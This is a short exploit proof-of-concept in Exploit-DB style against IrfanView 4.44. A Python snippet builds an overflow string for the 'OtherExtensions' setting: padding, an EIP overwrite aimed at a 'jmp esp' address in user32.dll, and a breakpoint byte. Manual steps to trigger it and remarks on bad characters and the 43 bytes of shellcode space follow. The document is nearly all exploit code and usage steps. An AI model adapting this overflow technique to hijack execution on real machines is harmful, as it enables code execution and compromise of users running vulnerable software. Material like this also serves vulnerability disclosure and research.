|
# Exploit Title: Irfanview - OtherExtensions Input Overflow # Date: 29-04-2017 # Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button # Exploit Author: Dreivan Orprecio #Version: Irfanview 4.44 #Irfanview is vulnerable to overflow in "OtherExtensions" input field #Debugging Machine: WinXP Pro SP3 (32bit) #POC #!usr/bin/python eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc" print buffer #a) irfanview->Option->Properties/Settings->Extensions #b) Paste the buffer in the "other" input then press ok, repeat a) and b) #badcharacters: those instruction that start with 6,7,8,E,F #Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit #Any other way around this?
|
|
|